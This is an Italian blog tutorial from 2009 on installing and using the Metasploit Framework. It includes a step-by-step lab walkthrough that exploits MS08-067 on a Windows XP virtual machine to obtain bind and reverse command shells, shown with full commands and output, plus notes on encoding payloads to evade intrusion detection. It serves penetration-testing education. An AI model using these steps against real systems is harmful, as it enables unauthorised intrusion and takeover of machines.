VoIP and Hacking | Consulenza Documentazione

Introduzione a Metasploit Framework

by admin on Dec.13, 2009, under Hacking, Linux, Sicurezza, Tools

Il Metasploit Framework è una sofisticata piattaforma open-source per lo sviluppo ed il test di codice exploit. Metasploit è conosciuto a livello mondiale e viene usato dai professionisti di network security per effettuare penetration tests, dagli amministratori di sistema per verificare la corretta installazione di patches, da produttori per effettuare regression tests, ed in generale da tutti coloro che si occupano attivamente di sicurezza.
Metasploit Framework è un progetto che mira alla sicurezza dei sistemi operativi, testandone le vulnerabilità. A tal fine, utilizza un bagaglio di exploits conosciuti come efficaci nei confronti di targets specifici: varie releases di Windows, Linux, BSD, Unix in generale, e Mac OS.

Il framework, che nelle versioni 1 e 2 era scritto principalmente in Perl, dalla versione 3.0 è stato completamente riscritto nel linguaggio Ruby, ma include componenti scritti in C ed assembler.
Pure nuovi sono una GUI sperimentale, ed anche la componente più preziosa dell’intero framework, il modulo db_autopwn, che automatizza la scoperta di exploit e la loro esecuzione.

L’ambiente Ruby è normalmente disponibile per tutte le moderne distribuzioni Linux, ma per poter sfruttare il framework nella sua versione più recente è necessario disporre di Ruby in versione 1.9.1 o superiore, motivo per cui, volendolo utilizzare su Debian 5.0, è necessario installare Ruby da sorgente.

Questo è il procedimento di installazione che ho seguito per Debian 5.0:


# cd /opt/
# wget ftp://ftp.ruby-lang.org/pub/ruby/snapshot.tar.gz
# tar xvzf snapshot.tar.gz
# cd snapshot
# ./configure
# make && make install

Una verifica può essere fatta con:

# ruby -v
ruby 1.9.2dev (2009-12-11 trunk 26067) [i686-linux]

e poi con:

# ruby -ropenssl -rzlib -rreadline -e "puts :Ciao"
Ciao

Per quanto riguarda l’installazione di rubygems:

# cd /opt/
# wget http://rubyforge.org/frs/download.php/60718/rubygems-1.3.5.tgz
# tar xvzf rubygems-1.3.5.tgz
# cd rubygems-1.3.5
# ruby setup.rb

a questo punto, l’installazione di MetaSploit può avvenire semplicemente tramite un comodo installer:

# cd /opt/
# wget http://www.metasploit.com/releases/framework-3.3.2-linux-i686.run
# ./framework-3.3.2-linux-i686.run

Metasploit si è diffuso velocemente grazie a due caratteristiche, la facilità di utilizzo e di installazione, oltre ovviamente al fatto che sia liberamente scaricabile per sistemi Windows e Linux.

Vediamo ad esempio una modalità alternativa per installarlo su Ubuntu 9.10:
Qui la situazione è leggermente diversa in quanto sono già disponibili tutte le dipendenze a livello di packages precompilati.
Innanzitutto installiamo le dipendenze (tramite apt-get o synaptic):

libopenssl-ruby1.9.1 (1.9.1.243-2)
libruby1.9.1 (1.9.1.243-2)
ruby1.9.1 (1.9.1.243-2)
irb1.9.1 (1.9.1.243-2)
libreadline-ruby1.9.1 (1.9.1.243-2)
rdoc1.9.1 (1.9.1.243-2)
rubygems1.9.1 (1.3.5-1ubuntu2)

poiché l’originale package ruby comprende un link simbolico a /usr/bin/ruby1.8, occorre crearne alternativamente uno che punti alla nuova versione:

# ln -s /usr/bin/ruby1.9.1 /usr/bin/ruby

Una volta che le dipendenze siano state installate, possiamo procedere col download del Framework (stavolta come tarball compresso):

# cd /opt/
# wget http://www.metasploit.com/releases/framework-3.3.1.tar.bz2
# tar xvjf framework-3.3.1.tar.bz2
# chown root:root -R /opt/metasploit3/msf3
# ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/

Supperto per database

Per potersi avvalere della funzionalità database, RubyGems deve avere gli appropriati drivers installati:

Per MySQL:

# apt-get install libmysqlclient15-dev
# gem install mysql
Building native extensions. This could take a while...
Successfully installed mysql-2.8.1
1 gem installed
Installing ri documentation for mysql-2.8.1...
Updating class cache with 1540 classes...
Installing RDoc documentation for mysql-2.8.1...

Estensioni

Il framework include alcune estensioni Ruby native che necessitano di essere compilate per poter sfruttare pienamente certi tipi di modulo.
Ad esempio la libreria ruby-pcap normalmente disponibile è molto limitata e non prevede funzionalità di packet processing, fornendo semplicemente l’interfaccia per la cattura dei pacchetti.

Per abilitare quindi la gestione dei moduli relativi ai raw sockets:

# apt-get install libpcap-dev
# cd /opt/metasploit3/msf3/external/pcaprub/
# ruby extconf.rb
# make && make install

Per abilitare invece i moduli relativi al wireless packet crafting:

# cd /opt/metasploit3/msf3/external/ruby-lorcon2/
# svn co https://802.11ninja.net/svn/lorcon/trunk lorcon2
# cd lorcon2
# ./configure --prefix=/usr && make && make install
# cd ..
# ruby extconf.rb
# make && make install

Aggiornamento del Framework MetaSploit

Il Framework Metasploit viene aggiornato giornalmente con i più recenti exploits, payloads, features, e bug fixes.
Personalmente, consiglio un aggiornamento ogni due settimane.

L’aggiornamento del framework può essere attuato tramite subversion:

# svn update /opt/metasploit3/msf3/
[...]

Interazione col Framework Metasploit

Sono nativamente disponibili numerose e differenti interfacce al Framework Metasploit, ciascuna coi propri pregi e difetti.
Il framework prevede inoltre una serie di tools di servizio:

  • msfpayload è uno strumento per la generazione di payload in modalità stand-alone
  • msfencode permette la codifica degli shellcode con finalità di evasione IDS oppure per evitare eventuali caratteri non consentiti dall’applicazione attaccata.
  • msfd permette di eseguire il framework in modalità daemon al fine di renderlo utilizzabile da remoto attraverso connessioni client (come client è possibile usare anche i semplici telnet o netcat); ogni client avrà a disposizione una propria interfaccia msfconsole totalmente indipendente.

Esaminiamo le interfaccie disponibili:

msfcli

Msfcli dispone di un potente interfaccia al framework a riga di comando.
Quando si utilizza msfcli, le variabili vengono assegnate tramite l’operatore ‘=’ e tutte le opzioni sono case-sensitive.

Per conoscere i possibili target di uno specifico exploit, in questo caso windows/smb/ms08_067_netapi, va utilizzato lo specificatore di modo T:

# ./msfcli windows/smb/ms08_067_netapi T
[*] Please wait while we load the module tree…

Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
5 Windows 2003 SP0 Universal
6 Windows 2003 SP1 English (NO NX)
7 Windows 2003 SP1 English (NX)
8 Windows 2003 SP2 English (NO NX)
9 Windows 2003 SP2 English (NX)
[...]
23 Windows XP SP2 Italian (NX)
[...]
47 Windows XP SP3 Italian (NX)
[...]
55 Windows XP SP3 Russian (NX)
56 Windows XP SP3 Swedish (NX)
57 Windows XP SP3 Turkish (NX)

Quando non si sia completamente sicuri sulle opzioni relative ad un particolare modulo, si può appendere la lettera ‘O’ al termine della stringa in qualsiasi punto in cui si sia in dubbio.

# ./msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree…

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Ed ecco infine come ottenere una shell su una macchina windows xp sp2:

# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.253 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree…
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 - lang:Italian
[*] Selected Target: Windows XP SP2 Italian (NX)
[*] Triggering the vulnerability…
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.10:35634 -> 192.168.1.253:4444)

Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>netstat -n -b -v
netstat -n -b -v

Connessioni attive

Proto Indirizzo locale Indirizzo esterno Stato PID
TCP 192.168.1.253:4444 192.168.1.10:44433 ESTABLISHED 1020
[svchost.exe]

C:WINDOWSsystem32>

Sebbene sia semplicemente fantastica da usarsi all’interno di scripts e per una automazione di base, msfcli tuttavia non supporta nessuna delle features avanzate di automazione consentite da msfconsole.

msfgui

Msfgui, come il nome suggerisce, fornisce una interfaccia utente di tipo grafico al Metasploit Framework.
Msfgui è una classica interfaccia grafica che utilizza un “assistente” (un wizard) per la composizione di un attacco; si tratta di un approccio ancora più semplice e veloce rispetto all’interfaccia web. Va fatto notare che questa funzionalità permette di utilizzare anche la modalità autopwn.

Aspetti negativi di msfgui sono:

  • L’abbandono del suo sviluppo e della sua manutenzione dalla versione 3.3 del Metasploit Framework.
  • La particulare instabilità e tendenza a crashare.

Per invocarla, basterà comunque digitare semplicemente:

# msfgui

con l’accortezza di avere in precedenza installato i suoi prerequisiti, ovvero i packages ruby-gtk2 e ruby-libglade2, insieme con le relative dipendenze ruby-pango, ruby-glib2, ruby-gdkpixbuf2, e ruby-atk.

msfweb

Il componente msfweb di Metasploit è una interfaccia multi-user al framework basata su ruby-on-rails.
L’interfaccia msfweb non pretende assolutamente di essere sicura e dovrebbe venire perciò usata solamente in ambienti “trusted”.
Per accedervi, occorre prima eseguire msfweb per avviare il server.
L’interfaccia msfweb utilizza il web server WEBrick per gestire le richieste. Per default, esso si pone in ascolto all’indirizzo di loopback (127.0.0.1) sulla porta 55555.

# ./msfweb
[*] Warning: As of Metasploit 3.3 this interface is no longer supported:
Please see https://metasploit.com/redmine/issues/502

[*] Starting msfweb v3.3.1-release on http://127.0.0.1:55555/

=> Booting WEBrick
=> Rails 2.3.2 application starting on http://127.0.0.1:55555
[*] Initializing the Metasploit Framework…
[*] Initialized the Metasploit Framework
=> Call with -d to detach
=> Ctrl-C to shutdown server
[2009-12-11 00:33:18] INFO WEBrick 1.3.1
[2009-12-11 00:33:18] INFO ruby 1.9.1 (2009-07-16) [i486-linux]
[2009-12-11 00:33:18] INFO WEBrick::HTTPServer#start: pid=4091 port=55555
[...]
Processing MsfController#index (for 127.0.0.1 at 2009-12-11 00:33:55) [GET]
Rendering template within layouts/msfweb
Rendering msf/index
Completed in 9ms (View: 6 | 200 OK [http://127.0.0.1/]
[...]

Per accedere all’ interfaccia, basta aprire il browser puntandolo alla specifica URL (http://127.0.0.1:55555/ per default). L’interfaccia principale di msfweb consiste di una toolbar contenente varie icone e di uno sfondo col logo di metasploit. Per accedere da qui ad una console, basta clicare sul link Console. Tale interfaccia console è pressoché identica all’interfaccia standard msfconsole.
I links Exploits, Auxiliary, e Payloads guidano l’utilizzatore attraverso i processi relativi a selezionare un modulo, configurarlo, ed eseguirlo. Una volta che un exploit sia andato in esecuzione ed una sessione sia stata creata, vi si può accedere tramite il link Sessions.
Verra aperta una sotto-finestra nella pagina corrente. La finestra può essere spostata, minimizata, massimizzata, e chiusa.

msfconsole

Msfconsole rappresenta probabilmente l’interfaccia al MSF più diffusamente utilizzata. Fornisce una console centralizzata “all-in-one” e consente virtualmente un accesso completo a tutte le opzioni attualmente disponibili nel Metasploit Framework.
Msfconsole può inizialmente intimidire un po’, ma di solito, una volta che si sia appresa la sintassi dei comandi, si arriva presto ad apprezzare la potenza di tale interfaccia.

Per abitudine preferisco la linea di comando, ma su alcuni programmi e Metasploit è uno di quelli, quest’ultima è senza dubbio preferibile.

Da terminale digitiamo quindi:

# ./msfconsole

                |                    |      _) |
 __ `__    _  __|  _` |  __| __   |  _   | __|
 |   |   |  __/ |   (   |__  |   | | (   | | |
_|  _|  _|___|__|__,_|____/ .__/ _|___/ _|__|
                              _|                   

       =[ metasploit v3.3.3-dev [core:3.3 api:1.0]
+ -- --=[ 468 exploits - 218 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7821 updated today (2009.12.11)

per avviare la console di metasploit.

Una volta lanciato il programma, vengono subito indicati il numero degli exploit, dei payloads, degli encoders e dei nops a disposizione.

Digitando 'help' o un '?' al prompt di comando verrà mostrato un elenco di comandi disponibili insieme ad una descrizione sintetica del loro scopo.

msf > help

Core Commands
=============

Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
[...]
unset Unsets one or more variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers


Database Backend Commands
=========================

Command Description
------- -----------
db_connect Connect to an existing database
db_create Create a brand new database
db_destroy Drop an existing database
db_disconnect Disconnect from the current database instance
db_driver Specify a database driver

msf >

Altri comandi generici sono:

  • "back" permette di tornare al contesto precedente qualora abbiate utilizzato comandi che caricano delle sottoroutine, ad esempio “load” e “use”.
  • "banner" ripropone il banner descrittivo che viene mostrato all’avvio della msfconsole.
  • "cd" cambia la directory di lavoro corrente, all’interno della msfconsole è infatti possibile utilizzare alcuni comandi di shell come appunto cd, "dir", "ls".
  • "load", "loadpath" e "unload" servono per caricare/scaricare alcuni plugin esterni al framework, come ad esempio quelli che permettono di utilizzare funzionalità database all’interno di Metasploit.
  • "quit" esce dalla msfconsole.
  • "sessions" serve a gestire le sessioni, ogni volta che un attacco avrà esito positivo verrà creata una sessione, con questo comando è possibile visualizzarne la lista, entrare/uscire da esse, oppure terminarle in maniera forzata.
  • "use" serve a selezionare i moduli da utilizzare.
  • "save" serve a salvare le impostazioni correnti.
  • "set" ed "unset" servono ad impostare o resettare i valori assegnati alle variabili.
  • "setg" ed "unsetg" servono ad impostare o resettare i valori assegnati alle variabili globali.
  • "version" mostra la versione del framework e della msfconsole.

Metasploit prevede la creazione di alcuni file di log nella cartella ".msf3" presente nella home dell'utente.
Più genericamente in:

~/.msf3/logs/

La funzionalità di log dipende in parte dalla variabile globale "LogLevel" che per default non è impostata ma può assumere un valore intero positivo relativo alla verbosità.
Si può settarla direttamente dalla console in questo modo:

msf > setg LogLevel 1
LogLevel 1 => 1
msf > save
Saved configuration to: /root/.msf3/config
msf >

Per deimpostarla invece:

msf > unsetg LogLevel
Unsetting LogLevel...
msf > save
Saved configuration to: /root/.msf3/config
msf >

In msfconsole è possibile l'esecuzione di comandi esterni. Ad esempio, nmap, se installato sul sistema, è utilizzabile anche dall’interno della msfconsole:

msf > nmap -sS -P0 192.168.1.253
[*] exec: nmap -sS -P0 192.168.1.253


Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-13 14:44 CET
Interesting ports on 192.168.1.253:
Not shown: 997 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:01:2A:E6 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 15.15 seconds
msf >

La funzionalità base del framework consiste in un launcher di moduli, il quale permette all'utente di configurare un modulo exploit e lanciarlo contro un sistema target. Se l' exploit ha successo, il payload viene eseguito sul sistema target e all'utente viene fornita una shell per interagire col payload.

* Il termine exploit (dall’inglese “to exploit” – “sfruttare”) in informatica identifica un metodo che è in grado di sfruttare i problemi che affliggono un sistema operativo oppure una determinata applicazione al fine di permettere all’attaccante di eseguire un payload sul sistema attaccato. Un exploit potrebbe anche essere studiato per creare un disservizio, in questo caso parliamo di DoS (Denial of Service)
* Con il termine payload (a volte chiamato anche shellcode), attenendosi all’argomento che stiamo trattando, ci riferiamo ad una sequenza di comandi che vengono eseguiti grazie ad un exploit e che determinano il tipo di impatto che l’attacco avrà sul sistema bersaglio. Un payload potrebbe per esempio essere costituito da un codice che ha lo scopo di creare un utente amministrativo sul sistema attaccato, oppure che fornisce all’attaccante una shell dei comandi in grado di controllare la macchina remota… e così via.

Le tipologie di payload messe a disposizione sono principalmente queste:

  • adduser, aggiunge un account utente nel sistema attaccato.
  • dllinject, inietta nel sistema una libreria arbitraria.
  • download_exec, scarica e manda in esecuzione un eseguibile arbitrario nel sistema attaccato.
  • exec, esegue un comando arbitrario nel sistema attaccato.
  • meterpreter, il coltellino svizzero dell’attacco alle piattaforme windows, è stato sviluppato appositamente per Metasploit e permette di eseguire una grande varietà di comandi sul sistema attaccato.
  • shell, permette di ottenere un prompt dei comandi sul sistema attaccato.
  • upexec, permette l’upload e l’esecuzione di un eseguibile arbitrario sul sistema attaccato.
  • vncinject, inietta ed esegue una sessione VNC sul sistema attaccato, permettendo all’attaccante di ottenere il controllo remoto della sessione utente.

Ognuno di questi payload può essere eseguito in una particolare modalità, la scelta della quale è dettata dalla situazione nella quale ci si trova ad operare. Per esempio: se il sistema target fosse protetto da un firewall, per ottenere comunque su di esso un prompt dei comandi sarebbe necessario utilizzare una modalità reverse shell (Reverse TCP Stager/Inline) piuttosto che una connessione diretta (Bind TCP Stager/Inline). Invece, se il sistema remoto fosse protetto da un firewall in grado di effettuare anche una ispezione dei pacchetti a livello applicativo (application level filter) potrebbe essere necessario eseguire il payload tramite PassiveX Reverse HTTP Tunneling Stager. In tal caso verrà dapprima modificato il registro di sistema e poi lanciato Internet Explorer, il quale risulterà a quel punto configurato per caricare un controllo ActiveX in grado di eseguire il tunneling HTTP del payload verso il nostro computer.

Il comando "show" fornisce la lista completa dei moduli di un determinato tipo.
Quindi "show exploits" restituisce la lista completa degli exploit disponibili, mentre "show payloads" restituisce la lista completa dei payload utilizzabili con gli exploit.
Analogamente, "show encoders", "show auxiliary", e "show nops", restituiscono anche essi le rispettive liste di moduli.
Per una maggior precisione:

  • Gli encoders sono algoritmi in grado di codificare un payload al fine di renderlo invisibile agli eventuali sistemi di Intrusion Detection (IDS).
  • I moduli ausiliari (auxiliary) sono dei piccoli programmi che si occupano invece di eseguire azioni specifiche come ad esempio una scansione di rete, una operazione di fuzzing, un attacco DoS, sniffing di credenziali, ecc…
  • I moduli nop servono per generare istruzioni di tipo no-operation che hanno lo scopo di riempire il buffer, la memoria di un sistema. Questo tipo di modulo può tornare utile per la scrittura di exploit personalizzati.

Una palestra ideale per impratichirsi nel maneggiare il Framework Metasploit consiste nell'esecuzione di un sistema operativo Windows su virtual machine (per gli esempi ho usato Windows XP SP2 su Sun Virtualbox). Sarà possibile verificare facilmente quanto un sistema del genere possa risultare vulnerabile, e controllarne i diversi comportamenti applicando progressivamente patch che possano sistemare i vari bug.

Tornando all'esempio in corso, ora dobbiamo indicare l’exploit. Motivo per cui scriveremo su console:

msf > show exploits
[...]

Gli exploit sono catalogati in categorie e sottocategorie, e lo schema di catalogazione è il seguente:

sistema operativo / servizio-applicazione / vulnerabilità

Questo schema (lo stesso vale per i payloads), introdotto nella versione 3 del framework, rende molto più intuitiva la ricerca dell’exploit e del payload da utilizzare.

Utilizzeremo ancora l’exploit "windows/smb/ms08_067_netapi"

Occorre quindi selezionare tale exploit (con il comando "use"), e poi richiedere quali eventuali parametri occorra ancora specificare (con il comando "show options"):

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Exploit target:

Id Name
-- ----
0 Automatic Targeting


msf exploit(ms08_067_netapi) >

Di solito i parametri da soddisfare consistono in una determinata porta, o nell’ip della macchina (RHOST), come in questo caso.
Per soddisfare tale opzione digitiamo:

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.253
RHOST => 192.168.1.253

A questo punto possiamo scegliere un payload con il comando show payloads

msf exploit(ms08_067_netapi) > show payloads
[...]
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
[...]

Ad esempio:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp

utilizzo qui, rispetto all'esempio precedente, un diverso payload, il quale prevede anch'esso dei parametri in ingresso, ora compresi nel nuovo output del comando show options.

msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port


Exploit target:

Id Name
-- ----
0 Automatic Targeting

Il particolare payload selezionato rende possibile specificare l' indirizzo IP verso il quale una connessione inversa verrà effettuata, e la porta della stessa.

Ad esempio:

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.10
msf exploit(ms08_067_netapi) > set LPORT 43758

Una volta impostati i parametri necessari possiamo avviare l'exploit:

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Italian
[*] Selected Target: Windows XP SP2 Italian (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.10:43758 -> 192.168.1.253:32132)

Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>

Ancora una volta il tentativo di accesso al sistema target è stato coronato da successo.

Ricapitolando dunque i passi basilari nell' utilizzo del framework:

  1. Scelta e configurazione di un exploit.
  2. Verifica della vulnerabilità del sistema remoto rispetto all’exploit scelto.
  3. Scelta e configurazione di un payload (il codice che verrà eseguito sul computer target nel momento in cui l’exploit avrà avuto successo (una shell dei comandi o di un controllo remoto VNC).
  4. Scelta di una tecnica di codifica per tale payload in modo da renderlo non rilevabile da sistemi per la prevenzione o il rilevamento delle intrusioni (IPS e IDS).
  5. Esecuzione dell’exploit e acquisizione del controllo del sistema remoto.
Send post as PDF to PDF | PDF Creator | PDF Converter
:, , , , , , ,

Comments are closed.

Cerchi qualcosa in particolare?

Usa il form qui sotto per cercare nel sito:

Blogroll!

Alcuni links...

Archives

Tutte le entries, in ordine cronologio...